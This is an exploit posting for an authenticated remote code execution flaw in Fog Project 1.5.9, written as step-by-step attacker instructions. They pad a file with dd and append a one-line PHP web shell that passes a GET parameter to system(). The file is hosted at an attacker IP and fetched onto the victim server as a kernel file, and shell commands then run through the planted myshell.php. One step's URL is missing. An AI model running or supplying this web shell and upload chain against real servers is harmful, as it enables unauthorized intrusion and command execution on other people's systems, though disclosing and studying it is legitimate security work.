Fog Project 1.5.9 Shell Upload

Fog Project version 1.5.9 suffers from a remote shell upload vulnerability.

MD5 | 4137325100e71652f6c4dc385797fd66

# Exploit Title: Fog Project - File Upload RCE (Authenticated)

# Date: 2021-04-28
# Exploit Author: [email protected]
# Vendor Homepage:
# Software Link:
# Tested on: Debian 10

On the Attacker Machine:

1) Create an empty 10Mb file.
dd if=/dev/zero of=myshell bs=10485760 count=1

2) Add your PHP code to the end of the file created in the step 1.
echo '<?php $cmd=$_GET["cmd"]; system($cmd); ?>' >> myshell

3) Put the file "myshell" accessible through HTTP.
$ cp myshell /var/www/html

4) Encode the URL to get "myshell" file to base64 (Replacing Attacker IP).
$ echo "http://ATTACKER_IP/myshell" | base64

5) Visit

6) Appears a textbox, change the Kernel Name (bzImage32) to myshell.php
and click on Install.

7) Visit http://VICTIM_IP/fog/service/ipxe/myshell.php?cmd=hostname

Related Posts